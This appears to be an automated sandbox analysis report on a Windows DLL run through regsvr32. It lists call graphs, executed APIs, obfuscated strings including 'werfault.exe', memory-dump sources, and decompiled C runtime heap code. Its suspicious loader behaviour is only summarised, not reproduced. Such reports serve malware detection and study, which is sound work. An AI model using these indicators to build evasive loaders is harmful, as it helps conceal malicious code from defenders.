16611 7fef753a028 16610->16611 16612 7fef753a234 16611->16612 16617 7fef753a039 __initmbctable 16611->16617 16618 7fef753a08e __initmbctable 16611->16618 16614 7fef753a25d IsValidCodePage 16612->16614 16612->16617 16613 7fef7533280 __GSHandlerCheck 8 API calls 16615 7fef753a470 16613->16615 16616 7fef753a27b GetCPInfo 16614->16616 16614->16617 16615->16597 16616->16617 16620 7fef753a295 __initmbctable 16616->16620 16617->16613 16624 7fef753a5e0 GetCPInfo 16618->16624 16621 7fef753a5e0 __initmbctable 19 API calls 16620->16621 16621->16617 16622->16596 16623->16602 16627 7fef753a61f 16624->16627 16633 7fef753a7dc 16624->16633 16625 7fef7533280 __GSHandlerCheck 8 API calls 16626 7fef753aa30 16625->16626 16626->16617 16628 7fef753f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16627->16628 16629 7fef753a734 16628->16629 16635 7fef753ef00 16629->16635 16631 7fef753a788 16632 7fef753ef00 __initmbctable 7 API calls 16631->16632 16632->16633 16633->16625 16634 7fef753a80a 16633->16634 16634->16617 16636 7fef753ef2c _CrtMemDumpAllObjectsSince 16635->16636 16639 7fef753efb0 16636->16639 16638 7fef753ef8e _LocaleUpdate::~_LocaleUpdate 16638->16631 16640 7fef753efd4 __initmbctable 16639->16640 16641 7fef753f068 MultiByteToWideChar 16640->16641 16646 7fef753f0ac malloc _MarkAllocaS 16641->16646 16647 7fef753f0a5 _CrtMemDumpAllObjectsSince_stat 16641->16647 16642 7fef753f122 MultiByteToWideChar 16643 7fef753f164 LCMapStringW 16642->16643 16642->16647 16644 7fef753f1a8 16643->16644 16643->16647 16645 7fef753f1b8 16644->16645 16653 7fef753f222 malloc _MarkAllocaS 16644->16653 16645->16647 16648 7fef753f1d9 LCMapStringW 16645->16648 16646->16642 16646->16647 16647->16638 16648->16647 16649 7fef753f2ac LCMapStringW 16649->16647 16650 7fef753f2ea 16649->16650 16651 7fef753f2f4 WideCharToMultiByte 16650->16651 16652 7fef753f341 WideCharToMultiByte 16650->16652 16651->16647 16652->16647 16653->16647 16653->16649 18846 7fef75414e1 18847 7fef75414ef DecodePointer 18846->18847 18848 7fef7541520 DecodePointer 18846->18848 18847->18848 18850 7fef754150f 18847->18850 18849 7fef7541540 18848->18849 18851 7fef7533280 __GSHandlerCheck 8 API calls 18849->18851 18850->18848 18852 7fef754157a 18851->18852 16659 7fef75335e1 16660 7fef75335f1 16659->16660 16664 7fef75335ea 16659->16664 16660->16664 16665 7fef75312b0 16660->16665 16663 7fef75312b0 14 API calls 16663->16664 16666 7fef75312de CoLoadLibrary 16665->16666 16673 7fef7532f8c 16665->16673 16667 7fef7532f2e VirtualAlloc RtlAllocateHeap 16666->16667 16668 7fef7532f0f MessageBoxA ExitProcess 16666->16668 16671 7fef7532f73 _calloc_dbg_impl 16667->16671 16667->16673 16669 7fef7533280 __GSHandlerCheck 8 API calls 16670 7fef75330ff 16669->16670 16670->16663 16670->16664 16672 7fef7532f83 CoTaskMemFree 16671->16672 16672->16673 16673->16669 17536 7fef7533fe1 17537 7fef7533fea SetLastError 17536->17537 18447 7fef7545de0 18452 7fef7533170 18447->18452 18451 7fef7545e86 18453 7fef75331ac 18452->18453 18454 7fef7533280 __GSHandlerCheck 8 API calls 18453->18454 18455 7fef7533263 18454->18455 18455->18451 18456 7fef7533870 18455->18456 18457 7fef75339db __SehTransFilter 18456->18457 18458 7fef75338de __SehTransFilter 18456->18458 18457->18451 18458->18457 18459 7fef7533a71 RtlUnwindEx 18458->18459 18459->18457 18460 7fef754ade0 18465 7fef754fee0 18460->18465 18463 7fef754adf9 18466 7fef754ff00 _fflush_nolock 25 API calls 18465->18466 18467 7fef754ade9 18466->18467 18467->18463 18468 7fef754fc70 18467->18468 18474 7fef754fc86 18468->18474 18469 7fef754fd59 18486 7fef7539360 LeaveCriticalSection 18469->18486 18471 7fef754fd63 18471->18463 18472 7fef754fd09 DeleteCriticalSection 18472->18474 18474->18469 18474->18472 18475 7fef7550580 18474->18475 18476 7fef7550599 18475->18476 18477 7fef755062a 18476->18477 18478 7fef75505ef 18476->18478 18479 7fef7550623 18477->18479 18487 7fef754ae10 18477->18487 18482 7fef753bd70 _invalid_parameter 17 API calls 18478->18482 18479->18474 18481 7fef7550651 18491 7fef7550680 18481->18491 18482->18479 18484 7fef755065c 18485 7fef754aee0 2 API calls 18484->18485 18485->18479 18486->18471 18488 7fef754ae77 EnterCriticalSection 18487->18488 18489 7fef754ae27 18487->18489 18490 7fef754ae3b 18488->18490 18489->18488 18489->18490 18490->18481 18494 7fef7550699 18491->18494 18492 7fef75506ef 18497 7fef753bd70 _invalid_parameter 17 API calls 18492->18497 18493 7fef755072d 18495 7fef7550723 18493->18495 18496 7fef754fdf0 _fflush_nolock 17 API calls 18493->18496 18494->18492 18494->18493 18495->18484 18498 7fef7550752 18496->18498 18497->18495 18499 7fef754afb0 _fflush_nolock 17 API calls 18498->18499 18500 7fef755076a 18499->18500 18502 7fef7550a20 18500->18502 18503 7fef7550a53 18502->18503 18509 7fef7550a33 __doserrno 18502->18509 18504 7fef7550abc __doserrno 18503->18504 18508 7fef7550b05 18503->18508 18506 7fef753bd70 _invalid_parameter 17 API calls 18504->18506 18505 7fef7550bd2 18507 7fef754fae0 _fflush_nolock 3 API calls 18505->18507 18506->18509 18510 7fef7550bdb 18507->18510 18508->18505 18511 7fef7550b89 __doserrno 18508->18511 18509->18495 18514 7fef7550c13 18510->18514 18516 7fef7550c80 18510->18516 18513 7fef753bd70 _invalid_parameter 17 API calls 18511->18513 18513->18509 18529 7fef754fbc0 LeaveCriticalSection 18514->18529 18517 7fef754f900 _fflush_nolock 17 API calls 18516->18517 18519 7fef7550c91 18517->18519 18518 7fef7550d05 18530 7fef754f7d0 18518->18530 18519->18518 18521 7fef7550ce5 18519->18521 18522 7fef754f900 _fflush_nolock 17 API calls 18519->18522 18521->18518 18523 7fef754f900 _fflush_nolock 17 API calls 18521->18523 18524 7fef7550cd6 18522->18524 18525 7fef7550cf8 CloseHandle 18523->18525 18526 7fef754f900 _fflush_nolock 17 API calls 18524->18526 18525->18518 18527 7fef7550d0f GetLastError 18525->18527 18526->18521 18527->18518 18528 7fef7550d22 _dosmaperr 18528->18514 18529->18509 18531 7fef754f7e3 18530->18531 18532 7fef754f878 __doserrno 18530->18532 18531->18532 18533 7fef754f87a SetStdHandle 18531->18533 18534 7fef754f86a 18531->18534 18532->18528 18533->18532 18535 7fef754f871 18534->18535 18536 7fef754f889 SetStdHandle 18534->18536 18535->18532 18537 7fef754f898 SetStdHandle 18535->18537 18536->18532 18537->18532 18853 7fef75448e0 18854 7fef75448f7 std::bad_exception::~bad_exception 18853->18854 18855 7fef754490c 18854->18855 18856 7fef754d710 _Ref_count LeaveCriticalSection 18854->18856 18856->18855 18052 7fef7549aeb 18053 7fef7549b2c 18052->18053 18054 7fef7549b18 18052->18054 18056 7fef754ab10 17 API calls 18053->18056 18055 7fef7549520 19 API calls 18054->18055 18055->18053 18061 7fef7549b38 18056->18061 18057 7fef7549c04 18058 7fef754a1cb 18057->18058 18062 7fef7549c23 GetConsoleCP 18057->18062 18059 7fef754a205 18058->18059 18060 7fef754a8ad WriteFile 18058->18060 18063 7fef754a400 18059->18063 18066 7fef754a21a 18059->18066 18064 7fef754a923 GetLastError 18060->18064 18071 7fef7549dd9 _dosmaperr __doserrno 18060->18071 18061->18057 18065 7fef7549bae GetConsoleMode 18061->18065 18083 7fef7549c4d 18062->18083 18067 7fef754a40e 18063->18067 18081 7fef754a5f3 18063->18081 18064->18071 18065->18057 18068 7fef754a33e WriteFile 18066->18068 18066->18071 18067->18071 18072 7fef754a531 WriteFile 18067->18072 18068->18066 18070 7fef754a3ea GetLastError 18068->18070 18069 7fef7533280 __GSHandlerCheck 8 API calls 18073 7fef754a9f5 18069->18073 18070->18071 18071->18069 18072->18067 18076 7fef754a5dd GetLastError 18072->18076 18074 7fef754a726 WideCharToMultiByte 18078 7fef754a791 GetLastError 18074->18078 18074->18081 18075 7fef7549f66 WideCharToMultiByte 18075->18071 18077 7fef7549fbf WriteFile 18075->18077 18076->18071 18080 7fef754a050 GetLastError 18077->18080 18077->18083 18078->18071 18079 7fef754a7b0 WriteFile 18079->18081 18082 7fef754a857 GetLastError 18079->18082 18080->18071 18080->18083 18081->18071 18081->18074 18081->18079 18082->18081 18083->18071 18083->18075 18084 7fef754a06d WriteFile 18083->18084 18085 7fef754a158 GetLastError 18083->18085 18087 7fef754f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18083->18087 18088 7fef754fc00 WriteConsoleW CreateFileW _putwch_nolock 18083->18088 18089 7fef754a1b5 GetLastError 18083->18089 18084->18083 18086 7fef754a103 GetLastError 18084->18086 18085->18071 18086->18071 18087->18083 18088->18083 18089->18071 18547 7fef75391ea 18548 7fef75391ef 18547->18548 18549 7fef75374e0 __crtExitProcess 3 API calls 18548->18549 18550 7fef7539203 18549->18550 18857 7fef753d0ea 18858 7fef753d0ef 18857->18858 18859 7fef7537090 _exit 33 API calls 18858->18859 18860 7fef753d209 18858->18860 18864 7fef753d0fc 18858->18864 18859->18860 18862 7fef753d289 18860->18862 18865 7fef7533d00 RtlEncodePointer 18860->18865 18862->18864 18866 7fef7539360 LeaveCriticalSection 18862->18866 18865->18862 18866->18864 18873 7fef75370e6 18874 7fef7537090 _exit 33 API calls 18873->18874 18875 7fef75370f0 18874->18875 18560 7fef75475e9 18563 7fef75475fb 18560->18563 18565 7fef75475f4 18560->18565 18561 7fef7533280 __GSHandlerCheck 8 API calls 18562 7fef7547d85 18561->18562 18564 7fef753bd70 _invalid_parameter 17 API calls 18563->18564 18564->18565 18565->18561 17538 7fef753a7e9 17540 7fef753a7f9 17538->17540 17539 7fef753a80a 17540->17539 17541 7fef7533280 __GSHandlerCheck 8 API calls 17540->17541 17542 7fef753aa30 17541->17542 17543 7fef753c7e9 17544 7fef753c90c EncodePointer EncodePointer 17543->17544 17545 7fef753c80d 17543->17545 17548 7fef753c8ca 17544->17548 17546 7fef753c872 17545->17546 17552 7fef7534a00 17545->17552 17546->17548 17549 7fef7534a00 _realloc_dbg 30 API calls 17546->17549 17550 7fef753c8ce EncodePointer 17546->17550 17551 7fef753c8bd 17549->17551 17550->17544 17551->17548 17551->17550 17553 7fef7534a22 17552->17553 17558 7fef7534a70 17553->17558 17555 7fef7534a4c 17569 7fef7539360 LeaveCriticalSection 17555->17569 17557 7fef7534a5b 17557->17546 17559 7fef7534ad4 _realloc_dbg 17558->17559 17568 7fef7534aae _calloc_dbg_impl 17558->17568 17560 7fef7536380 _CrtIsValidHeapPointer HeapValidate 17559->17560 17559->17568 17565 7fef7534e2c 17560->17565 17561 7fef7534f64 17570 7fef753bc30 17561->17570 17562 7fef7534f90 17585 7fef753ba60 17562->17585 17565->17561 17565->17562 17565->17568 17566 7fef7534fa6 17567 7fef7534fba HeapSize 17566->17567 17566->17568 17567->17568 17568->17555 17569->17557 17571 7fef753bc5f 17570->17571 17572 7fef753bc50 17570->17572 17573 7fef753bc67 17571->17573 17583 7fef753bc78 17571->17583 17596 7fef753abf0 17572->17596 17575 7fef753c020 _free_base 2 API calls 17573->17575 17581 7fef753bc5a _get_errno_from_oserr 17575->17581 17576 7fef753bcba 17578 7fef753abb0 _callnewh DecodePointer 17576->17578 17577 7fef753bc9a HeapReAlloc 17577->17583 17578->17581 17579 7fef753bce4 17580 7fef753bcee GetLastError 17579->17580 17579->17581 17580->17581 17581->17568 17582 7fef753abb0 _callnewh DecodePointer 17582->17583 17583->17576 17583->17577 17583->17579 17583->17582 17584 7fef753bd1f GetLastError 17583->17584 17584->17581 17586 7fef753ba76 17585->17586 17587 7fef753bacc 17586->17587 17588 7fef753bb07 17586->17588 17591 7fef753bd70 _invalid_parameter 17 API calls 17587->17591 17589 7fef753bb00 _get_errno_from_oserr 17588->17589 17590 7fef753bb32 HeapSize HeapReAlloc 17588->17590 17589->17566 17590->17589 17593 7fef753bb74 17590->17593 17591->17589 17592 7fef753bba0 GetLastError 17592->17589 17593->17592 17602 7fef753bbd0 HeapQueryInformation 17593->17602 17597 7fef753ac4d 17596->17597 17599 7fef753ac0a 17596->17599 17598 7fef753abb0 _callnewh DecodePointer 17597->17598 17601 7fef753ac21 17598->17601 17600 7fef753abb0 _callnewh DecodePointer 17599->17600 17599->17601 17600->17599 17601->17581 17603 7fef753bb90 17602->17603 17603->17589 17603->17592

                                                      Executed Functions

                                                      Function 000007FEF75312B0 Relevance: 210.9, APIs: 6, Strings: 114, Instructions: 872memorywindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                      • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                      • API String ID: 2181984824-2032897877
                                                      • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                      • Instruction ID: b6113464a3069b9c2ea7483fb119c14b36b3fc08ee8feeeb5aad03cf64425d1c
                                                      • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                      • Instruction Fuzzy Hash: CCE2C8F691A7C58FE3B48F62AA817DD3AA0F345748F509208D3991FA1DCB395242CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF7537640 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 290COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 7fef7537640-7fef7537671 GetStartupInfoW call 7fef7534980 162 7fef7537676-7fef7537687 160->162 163 7fef7537693-7fef75376ac 162->163 164 7fef7537689-7fef753768e 162->164 166 7fef75376c2-7fef75376d7 163->166 165 7fef7537cee-7fef7537cf5 164->165 167 7fef753777d-7fef7537784 166->167 168 7fef75376dd-7fef7537778 166->168 170 7fef753778a-7fef7537790 167->170 171 7fef7537ad6-7fef7537afb 167->171 168->166 170->171 172 7fef7537796-7fef75377de 170->172 176 7fef7537ce0-7fef7537cec SetHandleCount 171->176 177 7fef7537b01-7fef7537b2e 171->177 174 7fef75377f0 172->174 175 7fef75377e0-7fef75377ee 172->175 178 7fef75377fb-7fef7537833 174->178 175->178 176->165 179 7fef7537b42-7fef7537b56 177->179 180 7fef7537b30-7fef7537b3c 177->180 189 7fef7537975-7fef75379c7 178->189 190 7fef7537839-7fef753786e call 7fef7534980 178->190 181 7fef7537b65-7fef7537b6d 179->181 182 7fef7537b58-7fef7537b63 179->182 180->179 184 7fef7537cc0-7fef7537cd8 180->184 186 7fef7537b6f-7fef7537b7a 181->186 187 7fef7537b7c 181->187 185 7fef7537b95-7fef7537bb3 GetStdHandle 182->185 188 7fef7537cdb 184->188 193 7fef7537c95-7fef7537cb7 185->193 194 7fef7537bb9-7fef7537bc2 185->194 192 7fef7537b87-7fef7537b8e 186->192 187->192 188->176 189->171 197 7fef75379cd-7fef75379d9 189->197 203 7fef7537882-7fef75378ac 190->203 204 7fef7537870-7fef753787d 190->204 192->185 196 7fef7537cbe 193->196 194->193 198 7fef7537bc8-7fef7537be5 GetFileType 194->198 196->188 200 7fef75379df-7fef75379eb 197->200 201 7fef7537ad1 197->201 198->193 202 7fef7537beb-7fef7537c0d 198->202 200->201 205 7fef75379f1-7fef7537a01 200->205 201->171 206 7fef7537c0f-7fef7537c29 202->206 207 7fef7537c2b-7fef7537c3a 202->207 208 7fef75378c2-7fef75378e3 203->208 204->189 205->201 209 7fef7537a07-7fef7537a17 205->209 210 7fef7537c56-7fef7537c72 InitializeCriticalSectionAndSpinCount 206->210 207->210 211 7fef7537c3c-7fef7537c53 207->211 212 7fef7537970 208->212 213 7fef75378e9-7fef753796b 208->213 214 7fef7537a32-7fef7537aad InitializeCriticalSectionAndSpinCount 209->214 215 7fef7537a19-7fef7537a2c GetFileType 209->215 216 7fef7537c74-7fef7537c79 210->216 217 7fef7537c7b-7fef7537c93 210->217 211->210 212->189 213->208 219 7fef7537aaf-7fef7537ab4 214->219 220 7fef7537ab9-7fef7537ace 214->220 215->201 215->214 216->165 217->196 219->165 220->201
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                      • API String ID: 1930727954-3864165772
                                                      • Opcode ID: 53ed6c7dc9c3017b6de27dce3b9aec11c1bcaebc47f482f4e33ed4626b187432
                                                      • Instruction ID: 4fd499f206e1269e95e05e694953bda4b6002576a2de31bc31bcf6f481f5495e
                                                      • Opcode Fuzzy Hash: 53ed6c7dc9c3017b6de27dce3b9aec11c1bcaebc47f482f4e33ed4626b187432
                                                      • Instruction Fuzzy Hash: 13F11A32A1DBC5C9E7B08B19E88076AB7A1F389B64F104626DAAD477F4DB3CD445CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF7537DE0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 109COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                      • String ID: 0*X$_setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                      • API String ID: 1648969265-3521721853
                                                      • Opcode ID: f93d43cf3bb1813beee52146895ee3ce0099543f481cf7d004c716eae911393f
                                                      • Instruction ID: d084276c375975cac61ca52f902c53f851fb403f988e997b31319c858ca427aa
                                                      • Opcode Fuzzy Hash: f93d43cf3bb1813beee52146895ee3ce0099543f481cf7d004c716eae911393f
                                                      • Instruction Fuzzy Hash: D1512A32A3DB8682E7D08B15E48076A77E1F389798F501536FA8E877B5CB7DE4418B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF7537280 Relevance: 12.1, APIs: 8, Instructions: 104COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                      • String ID:
                                                      • API String ID: 3799933513-0
                                                      • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                      • Instruction ID: 50440ff04c6b651d32773591404ba5b67e5f7cae972734bbf51138f9a8de4c41
                                                      • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                      • Instruction Fuzzy Hash: B751EC72E3DA8685E6D09B14E48432A77E5F389798F101535FA8D427B5EF3CE444CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF7538670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                      • API String ID: 1823725401-2473407871
                                                      • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                      • Instruction ID: 668744335db3fe05506389b85c1bd172cdfc5ddd5165f6026b314cf31a900037
                                                      • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                      • Instruction Fuzzy Hash: 2C41E972628B8586E7948B56F84432BB7E1F784794F100029FACD4BB78DB7EE4548B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF753461B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 50%
                                                      			E000007FE7FEF753461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
				signed int _t64;
				intOrPtr _t66;
				void* _t73;
				void* _t92;
				long long _t98;
				long long _t113;
				long long _t114;
				long long _t115;
				long long _t130;
				intOrPtr _t132;
				long long _t135;

				if (_a136 == 1) goto 0xf7534672;
				_t64 = _a136 & 0x0000ffff;
				if (_t64 == 2) goto 0xf7534672;
				if (_a136 == 3) goto 0xf7534672;
				_a40 = "Error: memory allocation: bad memory block type.\n";
				_a32 = "%s";
				r9d = 0;
				r8d = 0;
				0xf753ad00();
				if (_t64 != 1) goto 0xf7534672;
				asm("int3");
				_t98 = _a128 + 0x34;
				_a96 = _t98;
				0xf753ac90(); // executed
				_a80 = _t98;
				if (_a80 != 0) goto 0xf75346b8;
				if (_a160 == 0) goto 0xf75346b3;
				 *_a160 = 0xc;
				goto 0xf75348b4;
				_t66 =  *0xf755b03c; // 0x39
				 *0xf755b03c = _t66 + 1;
				if (_a64 == 0) goto 0xf753472d;
				 *_a80 = 0;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = 0;
				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = 3;
				 *((intOrPtr*)(_a80 + 0x28)) = 0;
				goto 0xf7534844;
				if (0xffffffff -  *0xf755c960 - _a128 <= 0) goto 0xf7534763;
				_t130 =  *0xf755c960; // 0x4594
				 *0xf755c960 = _t130 + _a128;
				goto 0xf753476e;
				 *0xf755c960 = 0xffffffff;
				_t132 =  *0xf755c990; // 0xa0c
				 *0xf755c990 = _t132 + _a128;
				_t113 =  *0xf755c978; // 0x35bc
				_t92 =  *0xf755c990 - _t113; // 0xa0c
				if (_t92 <= 0) goto 0xf75347a8;
				_t114 =  *0xf755c990; // 0xa0c
				 *0xf755c978 = _t114;
				if ( *0xf755c980 == 0) goto 0xf75347c4;
				_t115 =  *0xf755c980; // 0x583b00
				 *((long long*)(_t115 + 8)) = _a80;
				goto 0xf75347d0;
				 *0xf755c968 = _a80;
				_t135 =  *0xf755c980; // 0x583b00
				 *_a80 = _t135;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = _a144;
				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = _a136;
				_t78 = _a88;
				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
				 *0xf755c980 = _a80;
				r8d = 4;
				E000007FE7FEF75332B0( *0xf755b04c & 0x000000ff, _a88,  *0xf755b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
				_t145 = _a128;
				r8d = 4;
				E000007FE7FEF75332B0( *0xf755b04c & 0x000000ff, _a88,  *0xf755b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
				_t73 = E000007FE7FEF75332B0( *0xf755b04f & 0x000000ff, _t78,  *0xf755b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
				_a72 = _a80 + 0x30;
				return E000007FE7FEF7539360(_t73, 4);
			}














                                                      0x7fef7534623
                                                      0x7fef753462c
                                                      0x7fef7534634
                                                      0x7fef753463e
                                                      0x7fef7534647
                                                      0x7fef7534653
                                                      0x7fef7534658
                                                      0x7fef753465b
                                                      0x7fef7534665
                                                      0x7fef753466d
                                                      0x7fef753466f
                                                      0x7fef753467a
                                                      0x7fef753467e
                                                      0x7fef7534688
                                                      0x7fef753468d
                                                      0x7fef7534698
                                                      0x7fef75346a3
                                                      0x7fef75346ad
                                                      0x7fef75346b3
                                                      0x7fef75346b8
                                                      0x7fef75346c0
                                                      0x7fef75346cb
                                                      0x7fef75346d2
                                                      0x7fef75346de
                                                      0x7fef75346eb
                                                      0x7fef75346f8
                                                      0x7fef753470c
                                                      0x7fef7534715
                                                      0x7fef7534721
                                                      0x7fef7534728
                                                      0x7fef7534743
                                                      0x7fef753474d
                                                      0x7fef753475a
                                                      0x7fef7534761
                                                      0x7fef7534763
                                                      0x7fef7534776
                                                      0x7fef7534783
                                                      0x7fef753478a
                                                      0x7fef7534791
                                                      0x7fef7534798
                                                      0x7fef753479a
                                                      0x7fef75347a1
                                                      0x7fef75347b0
                                                      0x7fef75347b2
                                                      0x7fef75347be
                                                      0x7fef75347c2
                                                      0x7fef75347c9
                                                      0x7fef75347d5
                                                      0x7fef75347dc
                                                      0x7fef75347e4
                                                      0x7fef75347f9
                                                      0x7fef7534809
                                                      0x7fef7534819
                                                      0x7fef7534829
                                                      0x7fef7534831
                                                      0x7fef7534835
                                                      0x7fef753483d
                                                      0x7fef7534854
                                                      0x7fef753485c
                                                      0x7fef753486d
                                                      0x7fef753487a
                                                      0x7fef7534882
